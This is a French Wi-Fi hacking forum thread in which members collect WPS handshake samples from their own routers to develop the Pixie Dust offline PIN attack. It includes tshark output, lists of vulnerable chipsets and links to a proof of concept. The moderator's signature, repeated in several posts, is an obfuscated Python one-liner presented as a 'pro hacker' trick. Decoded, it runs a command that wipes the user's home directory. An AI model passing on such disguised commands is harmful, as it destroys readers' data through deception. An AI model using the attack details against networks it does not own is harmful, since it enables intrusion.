Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 16-03-2015 23:28:11

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Pixie Dust attack : participez à la recherche avec vos échantillons !

Bonjour à tous.

TL;DR : Si vous avez WPS sur votre box, scrollez un peu

La Pixie Dust attack est l'attaque offline sur les paquets interceptés lors d'une négociation WPS PIN.
Les slides de l'auteur : https://passwordscon.org/wp-content/upl … ongard.pdf
C'est très simple :
1. Dans les deux premiers paquets (M1 et M2), client et AP s'échangent leurs clefs publiques (Diffie Hellman), l'AP en profite pour filer deux clefs secrètes aléatoires de 128 bits (dans M2, sa réponse) qui sont E-S1 et E-S2.
2. Le client chiffre les deux moitiés du PIN WPS avec ces deux clefs secrètes. Les deux hashs sont AES(HMAC(PIN1),E-S1) et AES(HMAC(PIN2),E-S2). Ces deux hashs sont E-Hash1 et E-Hash2. Le tout est envoyé dans le paquet M3, du client à l'AP.
3. Le reste on s'en fout, on ne va pas casser le reste.

Merci Stefan Viehböck pour ce super schéma :
zzz.png

La faille, c'est que E-S1 et E-S2 sont des clefs aléatoires de 128 bits, ce qui fait 256 bits aléatoires générés par la box.
La blague, c'est que les box et autres routeurs sont très mauvais en imagination de nombres aléatoires, l'embarqué et l'entropie ça fait deux.
Du coup, les générateurs de nombres aléatoires sont souvent faibles, voire prédictibles sur les box.
Dans le paquet M2 (et pas M1, soit c'est une coquille, soit j'ai pas compris), on entend un nombre aléatoire fourni par la box "wps.registrar_nonce".

Les fonctions de génération de nombres aléatoires, quand elles sont pétées, nous permettent de prédire les suites de nombres générés.

La Pixie Dust Attack revient à deviner les 256 bits aléatoires des deux clefs E-S1 et E-S2 en se basant sur le wps.registrar_nonce.

(Et c'est possible parce que certains constructeurs ont des fonctions aléatoires avec un état de 32bits (4294967296 états et on tourne en boucle, ça se bruteforce pépère, #OKLM), voire des fonctions aléatoires drôles. (Qui renvoient toujours des zéros))

C'est là que vous entrez en jeu si vous avez une box.

Ce qu'il me faut pour créer un programme qui fait toutes ces choses sympathiques (aucune implémentation publique n'est disponible actuellement), ce sont des données.

C'est très simple :
0. Vous changez le mot de passe de votre box avec un truc facile "forum.crack-wifi.com" et vous activez WPS PIN
1. Vous dumpez le trafic réseau Wi-Fi de votre PC avec Wireshark (pour ceux coincés sous Microsoft Windows ça fonctionne) ou airodump ou tshark ou tcpdump.
2. Vous vous connectez en WPS PIN sur votre box
3. Vous coupez wireshark en sauvegardant les paquets (les plus fous d'entre vous pourront appliquer le filtre "llc" pour minimiser la taille du .cap)
4. Vous remettez votre box dans l'état où elle était avant (avec WPS coupé big_smile )
5. Vous utilisez ce script : https://github.com/qolund/derp/blob/mas … /tshark.sh pour extraire des infos :

$ wget https://raw.githubusercontent.com/qolund/derp/master/test/pixie/tshark.sh
$ chmod +x tshark.sh
$ bash tshark.sh monfichier.pcap

Et vous me filez le résulat en répondant à ce thread avec une balise code.
Ce que ça donne sur un exemple du site de wireshark :

$ ./tshark.sh wpsdata.cap 
M1  wps.enrollee_nonce        : 814ad8606106cb4e7f33f214c3e69c0f
M2  wps.enrollee_nonce        : 814ad8606106cb4e7f33f214c3e69c0f
M2  wps.registrar_nonce       : e01f4de855947b5fec36d951f9b34442
M2  wps.authenticator         : 9eff0fd96214daa4
M3  wps.registrar_nonce       : e01f4de855947b5fec36d951f9b34442
M3  wps.authenticator         : d32cf630997563aa
M3  wps.e_hash1               : 6c845976af76d60a55f144b33804d8067afb93c8588efd5cc7e0bf3aed73d456
M3  wps.e_hash2               : f898213150eef18d0c69885533e93b9c955f1ce46807e1d91103d15bc4b1d433
M4  wps.enrollee_nonce        : 814ad8606106cb4e7f33f214c3e69c0f
M4  wps.authenticator         : 4da47e72b15d1cc5
M4  wps.encrypted_settings    : 2e31e111e5ea1d93777f1df75da0d2e6824bbd827c2db693a7723dd933c397ec2ec2af2b95dc23d24047c11ae394d52700ef5f25b04885611d5b0f2dba19d439
M4  wps.r_hash1               : 193e370e53176dc3047eeb39b4d96fda089a79e1b06956bdebb77c05944ee490
M4  wps.r_hash2               : fe994d8dbd8530a196a0b4ffb5d99525afb86b9ca0e23d385eb1ae337abb6a28
M5  wps.registrar_nonce       : e01f4de855947b5fec36d951f9b34442
M5  wps.authenticator         : b8e8cd727b579f0a
M5  wps.encrypted_settings    : 8742685ef6b31c6f7e2bca6cb92afc83a3bba18deb36a9568e00f38cc95e13b17dc228916c927bc37bb5c9e827bdf155bd711c78f0cd0f02f9e8d4dae024c0cb
M6  wps.enrollee_nonce        : 814ad8606106cb4e7f33f214c3e69c0f
M6  wps.authenticator         : 9b71d13781c96d2e
M6  wps.encrypted_settings    : 27e5255327b572435b73a1d48bd2b3f7a4620e6847e6d1c02d1a926c65be2a47f0cd7470af92649f80ddfc45d79140956f98a882cc6e4b698442855aa49ed342
M7  wps.registrar_nonce       : e01f4de855947b5fec36d951f9b34442
M7  wps.authenticator         : 0845f0b5607257ac
M7  wps.encrypted_settings    : 8742685ef6b31c6f7e2bca6cb92afc83a1daa2e90435ed979354f538c756e95127480f3d46f3b7da7b39fe57256738b44629b661af07f49a5953a0a065ba6341
M8  wps.enrollee_nonce        : 814ad8606106cb4e7f33f214c3e69c0f
M8  wps.authenticator         : f58fb1d52d1e8611
M8  wps.encrypted_settings    : 0dcf42e69f34903ab91474bab3b7d94ad3de8b0b2227f8d4287f50862d4eac31ad84ba66dad8fcedaea1d8f1023a71a4295f53b637471f5cf03366ff3415cc8afb2d1e9a95412bd8e740dc9726fa45a54ad99cf0e079df586156616e3ece4129e1b8aa280f024af132f23c2c521d4a90
MF  wps.enrollee_nonce        : 814ad8606106cb4e7f33f214c3e69c0f
MF  wps.registrar_nonce       : e01f4de855947b5fec36d951f9b34442
Client wps.manufacturer   : Atheros Communications
Client wps.device_name    : WXP-JBRAEUER-T1 - Jumpstart
Client wps.os_version     : 8388608
Client wlan.ta            : 00:1a:4f:9f:7e:a4
Client wps.model_name     : Jumpstart Enrollee
Client wps.model_number   : 23054
Client wps.serial_number  : 4423-8878
AP wps.manufacturer       : D-Link Systems
AP wps.device_name        : Xtreme N GIGABIT Router
AP wps.os_version         : 2147550467
AP wlan.ta                : 00:1b:11:60:82:f9
AP wps.model_name         : DIR-655
AP wps.model_number       : A1/A2
AP wps.serial_number      : none

Vos données restent les vôtres, si vous ne voulez pas mettre la MAC de votre box sur internet, ne la mettez pas hein big_smile

Merci de votre coopération, avec un peu de courage on sera les premiers à avoir une implémentation inédite de la nouvelle vulnérabilité sur le Wi-Fi qui ne concerne que WPS PIN.

Merci bisous,

Spawn

[ edit ] Ne vous embêtez pas à enregistrer une session, il faut aussi connaitre le secret d'une négociation de Diffie Hellman, ce qui implique de réaliser nous mêmes le protocole, la simple interception ne permet pas de réaliser l'attaque. Lisez donc la suite wink [/edit]

Dernière modification par spawn (23-03-2015 21:32:52)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 17-03-2015 04:07:01

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

Si je puis me permettre, ce serait super sympa si au passage vous mettiez aussi le modèle du chipset WiFi de votre routeur et le modèle... les noms ne sortes pas toujours complets dans les probes...
  Et juste au cas où : Il vous faut installer tshark pour utiliser tshark.sh :

sudo apt-get install tshark

fait parfaitement l'affaire dans une gentille debian et dérivées 
  On est sur des gros là les aminches!!!!
yeahanim upupup


CHIPSET REALTECK

-----------------------------------------REALTECK RTL8192CE----------------------------------------------


Chipset WiFi         : Realtek RTL8192CE
Fabricant             :     Alfa Network
Modèle                :     AIP-W525H 
Firmware Version :     v3.2.0.2.6
Self-PIN Number  :   07760891 


paquet *cap https://drive.google.com/file/d/0B4KnE5 … sp=sharing

retour t-shark.sh

M1  wps.enrollee_nonce        : 2e4ec9716da68cab5ec50c9d0eff29ec
M2  wps.enrollee_nonce        : 2e4ec9716da68cab5ec50c9d0eff29ec
M2  wps.registrar_nonce       : 319bbf8bfed91b16791246aa0985c8d2
M2  wps.authenticator         : 09bae12a9c04b2d9
M3  wps.registrar_nonce       : 319bbf8bfed91b16791246aa0985c8d2
M3  wps.authenticator         : 89a29af0b93a7aba
M3  wps.e_hash1               : a2f7149b14f1d52d7d45f687a1053510605e0cbf113ac2d95b6f41da8afec039
M3  wps.e_hash2               : 35e326c5704008544ef550f50d6b21e40bd57e6b32e19db8cef6779d82f66cff
M4  wps.enrollee_nonce        : 2e4ec9716da68cab5ec50c9d0eff29ec
M4  wps.authenticator         : 4f3912e010cf661f
M4  wps.encrypted_settings    : 40452246b8ae1ebf01f1e17a077e713f3b2ce175c73a18a762d31db7354fb096bcbb2f0e826443fe0ec1e5b6c2f8934b8540f11ddacc598f5abe32efb2c1f87a
M4  wps.r_hash1               : e265ac25e397005ae8304e84ffb9f3fa018bc4f1945b1eb957ca7245b4de9f51
M4  wps.r_hash2               : 8c46d4b3adc730cff3794b8267c6ae98eb836bac3db474530334436a2c51471b
M5  wps.registrar_nonce       : 319bbf8bfed91b16791246aa0985c8d2
M5  wps.authenticator         : e36a549f68a0a988
M5  wps.encrypted_settings    : 5bfa8aca622c013d455514a577beb8f74cb22c44070bc7363aec29d31a57e31abede6d7199f8480002307eec4d3c8dcde79c6d64c0278da86ce59776620dfcdb
M6  wps.enrollee_nonce        : 2e4ec9716da68cab5ec50c9d0eff29ec
M6  wps.authenticator         : fa3e5f268363a9b7
M6  wps.encrypted_settings    : 40f41ba11a699cf7d7b831ed6aebe8e5df5c09569da3e852594ed92aadab19857dd1f9c70c300b4c68e123413723ecef17389c01c989cb6144a7e78261b6d074
M7  wps.registrar_nonce       : 319bbf8bfed91b16791246aa0985c8d2
M7  wps.authenticator         : ede359a09d0732c2
M7  wps.encrypted_settings    : 5bfa8aca622c013d455514a577beb8f7182c175c7b383a646be55afb7926bc2d3851e1b7caefb8fdf83a95d173d0e6e9ab946dc54b59a3a1c2286164ecb094d147b535c2d4ca6bba9266d3d0940f21ea61e82129154bb9a714ede4180023c3dece8aa0eaa5ebf8069b653fabe325497c
Client wps.manufacturer   : 
Client wps.device_name    : 
Client wps.os_version     : 2147483648
Client wlan.ta            : 00:1a:ef:41:3c:ba
Client wps.model_name     : 
Client wps.model_number   : 
Client wps.serial_number  : 
AP wps.manufacturer       : Realtek Semiconductor Corp.
AP wps.device_name        : RTK_AP
AP wps.os_version         : 268435456
AP wlan.ta                : 00:c0:ca:78:b1:37
AP wps.model_name         : RTL8xxx
AP wps.model_number       : EV-2010-09-20
AP wps.serial_number      : 123456789012347

-----------------------------------------------------------------------------------------------

CHIPSET BORADCOM

------------------------------------- BROADCOM  BCM4360---------------------------------------------


Chipset WiFi         : Broadcom BCM4360
Fabricant              : Netgear
Modèle                 : R6300 WiFi Router
Versión                 : R6300 v1

paquet *cap : https://drive.google.com/file/d/0B4KnE5 … sp=sharing

retour Tshark:

M1  wps.enrollee_nonce        : 224cb4cb08277dfb74503de2cbee8a58
M2  wps.enrollee_nonce        : 224cb4cb08277dfb74503de2cbee8a58
M2  wps.registrar_nonce       : cffbd5b7a285800eb408acd9f4141d2f
M2  wps.authenticator         : c880f033d153762f
M3  wps.registrar_nonce       : cffbd5b7a285800eb408acd9f4141d2f
M3  wps.authenticator         : b6bdb8237851d231
M3  wps.e_hash1               : 6fd3db26a09ba14ca8814d7b89945e81cc22d4aaf4020c9c9018bc39bc6785c2
M3  wps.e_hash2               : 790b3eaa5d55c6b2dcff9e02a9512b54c57b4fb9d53854d7b49725e451a83ce5
M4  wps.enrollee_nonce        : 224cb4cb08277dfb74503de2cbee8a58
M4  wps.authenticator         : fbb688b9b1705c2c
M4  wps.encrypted_settings    : e54c341f245f3d37476d06411108aeacd3860e574ff038961c49913cecbcd14d642445f440e2144d3b84edbba5a15a77dfe79baced3149fba009ecd0b1e32a52
M4  wps.r_hash1               : 3786dbf62e08b3f066bf3e8b9278a2d6deaeb47735409b4592892f3d02b6f3a8
M4  wps.r_hash2               : 64277250c9afabe01032421f6ca9e39ff34c2e8ebb8bb2b5e63102cd0cb8995d
M5  wps.registrar_nonce       : cffbd5b7a285800eb408acd9f4141d2f
M5  wps.authenticator         : df341364b074d841
M5  wps.encrypted_settings    : b21b806d96b643d869fb233ae2235c1ae4e9ad1a7fd59921ed490bf39a0c1b6f00407189acaadbd4a51890d75eeffef895b3bbe206ad953ca132499e6f719af4
M6  wps.enrollee_nonce        : 224cb4cb08277dfb74503de2cbee8a58
M6  wps.authenticator         : 0d2362d95dfb86b1
M6  wps.encrypted_settings    : 4306563e37d9d8f1aed4af9def38d786c132a662aa4db8da224243d0cd89a4fc14593d14653c6ea834cd3fc732898d7a6b50df9a1f8572de516a9f1a004b3fd1
M7  wps.registrar_nonce       : cffbd5b7a285800eb408acd9f4141d2f
M7  wps.authenticator         : dba54635c8afe519
M7  wps.encrypted_settings    : e76bc032856b179e3be1e1598751acf821f21e1339f860e093b0311b22555ec0d42b1edcb6de191f7e67f621198a5753406c12b566a7bee1bf50d23bad0597349bfcff836e96f2aa70df3df3a021c9025d02c797a1af6f4d04db5d3c71300cf4df48c11da42770ab1cbd139610f284d3
Client wps.manufacturer   : 
Client wps.device_name    : 
Client wps.os_version     : 2147483648
Client wlan.ta            : 00:c0:ca:7b:d5:20
Client wps.model_name     : 
Client wps.model_number   : 
Client wps.serial_number  : 
AP wps.manufacturer       : NETGEAR, Inc.
AP wps.device_name        : R6300
AP wps.os_version         : 2147483648
AP wlan.ta                : 9c:d3:6d:a3:78:af
AP wps.model_name         : R6300
AP wps.model_number       : R6300
AP wps.serial_number      : 4536

----------------------------------------------------------------------------------------------



Chipset WiFi         : Broadcom BCM4360
Fabricant              : Netgear
Modèle                 : R7000

*cap : https://drive.google.com/file/d/0B4KnE5 … sp=sharing

retour tshark:

M1  wps.enrollee_nonce        : 7ca6b5585fa79f3608428ea4c0ce1ac1
M2  wps.enrollee_nonce        : 7ca6b5585fa79f3608428ea4c0ce1ac1
M2  wps.registrar_nonce       : e5a21923cac4b9e8699929364c9f9d0e
M2  wps.authenticator         : 56f0a03d2c6303f2
M3  wps.registrar_nonce       : e5a21923cac4b9e8699929364c9f9d0e
M3  wps.authenticator         : 0da881f96870eefd
M3  wps.e_hash1               : a2ec123931f757cc69f17e56eed2f8a76e37a7524dd948005c7561ef9e5e6815
M3  wps.e_hash2               : e7d5248d5c7b75f52e2073cf76176f236ce9bc679246fa95d081fd7b0e6d2903
M4  wps.enrollee_nonce        : 7ca6b5585fa79f3608428ea4c0ce1ac1
M4  wps.authenticator         : ceb00dcf0381ca2e
M4  wps.encrypted_settings    : 4a5f5ec1dda2af3c8e86ba9d2da1828235a01753b63f335c7ca6349e52df63d0a01706980d324ad13b408e420f008f433fac44104c867176545cbf9a509e56f1
M4  wps.r_hash1               : 97847419157cb0ab6ad11666c1edce87026a217cd8f2f2487ba2954ff542a674
M4  wps.r_hash2               : 9319f40272f0dc5911cbf27d1bdd44976b3f28ee6157a9480319c67b54b44d70
M5  wps.registrar_nonce       : e5a21923cac4b9e8699929364c9f9d0e
M5  wps.authenticator         : 403efb1b06f91c26
M5  wps.encrypted_settings    : 4a1be8b2f2c2cb6c6cdce3d5e7ce5e3be227df78426e7815172db1baa56c083fbe26e55048ef3f6efaca469095c02985aa37146ea368f6ab1e5eadefab213a36
M6  wps.enrollee_nonce        : 7ca6b5585fa79f3608428ea4c0ce1ac1
M6  wps.authenticator         : b4bbe93bd06fd8b0
M6  wps.encrypted_settings    : 44371a870262ffa11f1a51915a2d7a07e0732acba940681f803a6284f4f1944b06d06da61c30b02669284b3da8127175b30f28249269aaeb61efe0de39aad7e0
M7  wps.registrar_nonce       : e5a21923cac4b9e8699929364c9f9d0e
M7  wps.authenticator         : 401c0b43e285fad8
M7  wps.encrypted_settings    : c917e4b4c34a2881b08677a62cb41a2947d80ba9fdc75f11e9a15d44f4ad7450132bdc50f4587850c9c5a583df16c3a4b80cba534d36ee630473ff613c7e65d67654ef4d6de58612b7e98bb1bfb6b9b2c8efe3659dc80c85bd98c985a1baa2fb488d68f1dfee82d9de3bca0af7fd851b
Client wps.manufacturer   : 
Client wps.device_name    : 
Client wps.os_version     : 2147483648
Client wlan.ta            : 00:c0:ca:7b:d5:20
Client wps.model_name     : 
Client wps.model_number   : 
Client wps.serial_number  : 
AP wps.manufacturer       : NETGEAR, Inc.
AP wps.device_name        : R7000
AP wps.os_version         : 2147483648
AP wlan.ta                : e4:f4:c6:1b:36:73
AP wps.model_name         : R7000
AP wps.model_number       : R7000
AP wps.serial_number      : 32

-------------------------------------------------------------------------------------------

--------------------------------BROADCOM BCM5358UB0-----------------------



Chipset WiFi         : Broadcom BCM5358UB0
Fabricant              : Netgear
Modèle                 : WNDR3400
Version                 : 2

*cap: https://drive.google.com/file/d/0B4KnE5 … sp=sharing

retour tshark.sh

M1  wps.enrollee_nonce        : b824d05f4a5a2553c8c869ce74d468d8
M2  wps.enrollee_nonce        : b824d05f4a5a2553c8c869ce74d468d8
M2  wps.registrar_nonce       : 4caabc829630d6b62e6bf399f83c23c3
M2  wps.authenticator         : 36692d8c9aede32c
M3  wps.registrar_nonce       : 4caabc829630d6b62e6bf399f83c23c3
M3  wps.authenticator         : bb48136058cdabf4
M3  wps.e_hash1               : fa2d71411ef7e4705132ef062347790396f82598a6bfe3b9635d48f238287889
M3  wps.e_hash2               : 738c577e027f4febc04ac8d2491213127afe465a42479fdca84e503236f9656b
M4  wps.enrollee_nonce        : b824d05f4a5a2553c8c869ce74d468d8
M4  wps.authenticator         : 8738263ce5367400
M4  wps.encrypted_settings    : ecfe45d327cd9db14eab058dba458e2525c26a0e0b801c208b85871cd211b40c50b1f0e0cc6cc052672f963206558590a3e630c679b02af4911d3d347c2300ee
M4  wps.r_hash1               : ad51f37d86635cc2ba10582c5cdcf64675f9914fc5d68e7515d076d77fee65a3
M4  wps.r_hash2               : 14c486f2dd5da4ddc3389368d1f167fd52717b637677bbae822b73a2d932bd5a
M5  wps.registrar_nonce       : 4caabc829630d6b62e6bf399f83c23c3
M5  wps.authenticator         : 100f2df07a1fd2b9
M5  wps.encrypted_settings    : 4d865cb8b88ca29d8416c9e08660d91bc4c183ba9813435cc7b51c3170ba58fd21111dc1a3809eec7155d0f1a2cc997fc74290c69c7de11abc117eca1601088b
M6  wps.enrollee_nonce        : b824d05f4a5a2553c8c869ce74d468d8
M6  wps.authenticator         : 18a10dac72fb370f
M6  wps.encrypted_settings    : 3d262a2714c9f1d53e7e7ac3400ad3d3008af558304474e429ab10c335f9d82211f3673046f715085c1d92c73d8d0ed0d44832b2fbced7993b73a239e16e15fe
M7  wps.registrar_nonce       : 4caabc829630d6b62e6bf399f83c23c3
M7  wps.authenticator         : c471135b9fbee9bd
M7  wps.encrypted_settings    : c3f28773591e16bc2c9ee8c327b6d494c098b25b12f632d070052b991cf73c101d76cdba5817f9bda78b791517b8097dec0fb261748ac2912f0d6bcb7d1248392b916227e5cbd1d8896e167ccb2243c3f16966cb2f8d612cf0317ef4941354ac023309a21e439071a9dd6adaadf37800
Client wps.manufacturer   : 
Client wps.device_name    : 
Client wps.os_version     : 2147483648
Client wlan.ta            : 00:c0:ca:7b:d5:20
Client wps.model_name     : 
Client wps.model_number   : 
Client wps.serial_number  : 
AP wps.manufacturer       : NETGEAR, Inc.
AP wps.device_name        : WNDR3400v2
AP wps.os_version         : 2147483648
AP wlan.ta                : 2c:b0:5d:37:b5:ac
AP wps.model_name         : WNDR3400v2
AP wps.model_number       : WNDR3400v2
AP wps.serial_number      : 01


----------------------------------------------------------------------------------------


j'en mettrais plus sous peu.
C'est intéressant ces deux BCM4360 : ça pourait bien être un des modèles dont parle dominique : ces routeurs avec chipset broadcom dont les es-1 et 2 sont susceptibles d'ètres brute forcés.

a plus

Dernière modification par kcdtv (18-03-2015 01:54:36)

Hors Ligne

#3 19-03-2015 13:57:51

FurqanHanif
Nouveau membre
Inscription : 19-06-2014
Messages : 9

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

My Router not support/have WPS so i 'm afraid i can't help you in this... sad anyway Looking Forward of good Pixie Dust Attack Tool.. i Hope it'll be Out Soon...
i think their is another tool release by muskeTteam , also claims that it has pixie dust exploit too. here is the Link , you should check it.. maybe this 'll help...
(Page 2 , tool name is VMR-MDK009x2 )
https://forums.kali.org/showthread.php? … nto-Reaver

Hors Ligne

#4 19-03-2015 14:33:11

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

BIenvenue sur le forum

Le truc que tu mets en lien n'a strictement rien à voir avec pixie dust. wink
a plus

Welcome to the forum
This stuff has nothing to do with pixie dust... Cheers

Hors Ligne

#5 19-03-2015 18:17:54

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

un petit repost+  up mais c'est que la situation l'exige ou tout du moins le justifie

Pour ceux qui n'avaient pas très bien suivit nous savons qu'il y a deux implémentations foireuses.
 
 
  1 *L'une est celle sur laquelle s'attarde dominique et qui nécessite un brute force des "nounce" ES-1 et ES-2 et pour laquelle Spawn a besoin de données 
  2 *L'autre corespond au cas le plus foireux qu'il soit, c'est a dire le cas ou l'un des fabricants s'y est pris comme un huître (c'est très dur de taper sur un clavier quand vous êtres un huître) et on se retrouve avec ES-1 = ES-2 = 0
  Il ne reste plus alors qu'a générer les HMAC sha256 possibles jusqu'à avoir une coïncidence pour PK1 (10000 chaines maximum à vérifer) et PK2 (1000 max) .
Questión de secondes

  Sans plus attendre; et c'est avec beaucoup plus de plaisr, je poste cette capture d'écran ( historique tongue ) de notre première attaque Pixie dust (cas numéro 2 -le plus simple - ou ES1 = ES2 = 0 ) réalisée par

pixidust5.jpg

  attaque reálisée par l'ami wiire du forum kali ( voir : WPS Pixie Dust Attack (Offline WPS Attack)  )
  il s'agit "d'un tp-link avec chipset ralink"
CE qui veut dire qu'il s'agit du chipset wifi rt539x

TP-LINK TD-W8901N v1    TE7TDW8901NV1    bgn    RT63365E    2 MiB    8 MiB        RT5390
TP-LINK TD-W8951ND v5    TE7TDW8951NDV5    bgn    RT63365E    2 MiB    8 MiB        RT5390R
TP-LINK TD-W8961NB v3.0        bgn    RT63365E    2 MiB    8 MiB
TP-LINK TD-W8961ND v3.x    TE7TDW8961NDV3    bgn    RT63365E        64 MiB
TP-LINK TD-W8968 v2    TE7TDW8968V2    bgn    RT63365E    8 MiB    64 MiB

Chipsset que l'on retrouve chez d'autres fabricants...:
    ASUS, Zyxell, Comtrend, Trendnet,...

le poc de wire est disponible dans le fil de kali, sinon voilà un lien:
pixiewps.c

qui dit ralink... dit beaucoup de chipsets... la chase est ouverte, voici une "petite liste" de vos objectifs :
ralink chipset

Hors Ligne

#6 20-03-2015 19:21:41

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

Merci ! Je vais implémenter le bruteforce des PIN (naturellement), et le parcours de différents espaces de clefs pour ES1 et ES2.
Le but du jeu est de pouvoir identifier l'espace des clefs à parcourir en fonction du modèle de routeur (et de l'OS surtout, et de la fonction random() surtout).
Le premier espace de clef que l'on connaît est {{0,0}} , assez trivial.
Le second est ici :
http://trac.umnaem.webfactional.com/bro … cxx?rev=39, j'ai un TGV ce soir je vous raconte ça dimanche quand Internet revient wink

En attendant, merci beaucoup pour ces samples kcdtv big_smile


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#7 21-03-2015 00:19:03

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

Le premier espace de clef que l'on connaît est {{0,0}} , assez trivial.

big_smile

Le second est ici :
http://trac.umnaem.webfactional.com/bro … cxx?rev=39, j'ai un TGV ce soir je vous raconte ça dimanche quand Internet revient wink

cool cool  et surtout  ne loupe pas le train.
En regardant le code je vois que selon les commentaires 'il y a trois manipulations pour "améillorer" un algorithme léger  au départ

   // The above algorithm sucks in the lower bits, so we shave them off
168	    // and repeat a couple of times to make it up

Il disent même plutôt que c'est de la merde,
et si je comprends bien il s'agit de prendre trois bouts de chaines qui sont générés en utilsant la graine trois fois de suite pour en former une autre (afin de ne pas avoir la fin des chaine qui est mauvaise)
Il faudrait donc quelque chose dans l'esprit "columbia.py" pour mener un brute force "récursif"  si j'ai bien compris

En attendant, merci beaucoup pour ces samples kcdtv big_smile

Tu veux rire ou quoi? Merci beaucoup A TOI big_smile

Hors Ligne

#8 21-03-2015 11:00:21

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

Épilogue : j'ai trouvé des trucs.
Il me semble qu'on n'a pas à se faire chier à deviner des nombres aléatoires.
Je crois qu'en 18 paquets bien sentis n'importe quelle box avec le WPS PIN constant (=étiquette sous la box) est pétée.
J'ai écrit ça sur mon blog : http://méric.fr/blog/blackjack.html

Dernière modification par spawn (22-03-2015 22:39:31)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#9 23-03-2015 18:44:06

jvoisin
N00b
Inscription : 20-03-2015
Messages : 1

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

Est-ce que tu as un PoC ?

Hors Ligne

#10 23-03-2015 21:25:58

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

Bienvenue jvoisin !

Après relecture par des personnes au fait de la chose, j'ai interverti les rôles d'enrollee et de registrar, du coup ce que j'ai trouvé ne fonctionne plus (le contraire m'aurait étonné, il aurait impliqué que tout le monde se trompe sauf moi), et il devient clair qu'on est coincé, en tant qu'attaquant bienveillant, à l'étape 3 (Pixie Dust) :
- M1 : AP sends PK E + N1
- M2 : Client sends PK R + N2
- M3 : AP sends E-Hash1 and E-Hash2
Où E-Hash1 et E-Hash2 protègent les moitiés de PIN avec :
- La clef privée DHKey connue de l'AP et du client
- Une clef aléatoire secrète de 128 bits pour chaque hash.

L'écoute passive ne fonctionne pas, on aurait un logarithme discret à péter (Diffie Hellman, lisez la spec)
Et la Pixie Dust attack prend tout son sens, puisqu'on s'arrête juste avant de se faire jeter par l'AP qui nous reconnaît, on n'a qu'à deviner les 2 * 128 bits en prédisant le résultat de random().
On peut s'aider de N1, nombre aléatoire fourni par l'AP juste avant.

On ne peut plus s'en sortir avec un simple tshark d'une capture réseau, il va falloir effectuer le protocole nous mêmes pour négocier l'échange de clefs de Diffie Hellman.

Tout est nettement plus clair maintenant, il n'y a plus qu'à implémenter big_smile


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#11 24-03-2015 01:05:06

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

Bonjour et bienvenue sur le forum jvoisin smile

@ spawn
Donc c'est normal si je calais sur "Mais comment qu'on fait pour la auth key du hmac256"... je n'ai pas compris en quoi résidait le truc et le fond du pourquoi il était nécessaire d'implémenter le trafic au niveau de l'échange de clef  Diffie Hellman.
wire explique qu'il a fait comme ça :

To get AuthKey I have modified the source code of bully. The data is fed to the program as arrays of characters and then parsed and converted into byte arrays.

thread kali linux "Pixie dust"
on était proche du doom day avec le black jack big_smile
chusss

Hors Ligne

#12 27-03-2015 15:23:18

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Pixie Dust attack : participez à la recherche avec vos échantillons !

le mouvement "pixie dust" suit son bonhome de chemin...
les dernières news sont les suivantes:
  Faille "ES0" ( chipset ralink )
  Il fût difficle dans un prmier temps de trouver des routeurs avec chipset ralink.
  CE qui semble difficle maintenant que nous en avons trouvé quelques uns c'est d'en trouver qui NE SOIENT pas vulnérable à l'attaque "pixie dust"
  Quant à la faille "()random" ( chipset broadcom ), il est difficile de donner une évaluation de l'amplitude de dégâts. Personnellement  je suis environ sûr du 50-50 ...
  l'attaque est très rapide en soi, quelques secondes pour obtenir la authkey, quelques secondes pour avoit le PIN par défaut.
  J'ouvrirai tantôt un thread à part pour répertorier les modèles affectés.
Laissons celui-ci pour la recherche car il y a encore beaucoup à faire...
* Affiner l'attaque contre broadcom
* Bien codifier le flow WPS pour obtenir la authkey  (diffie hellman, arrêter au M3 + pleins de détails )
* Realteck semble aussi pouvoir avoir un faible niveau entropie au moment du protocole d’échange de clef deffie hellmann
* Etudier atheros

le printemps sera pixie dust cool

Hors Ligne

#13 27-03-2015 20:12:12

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

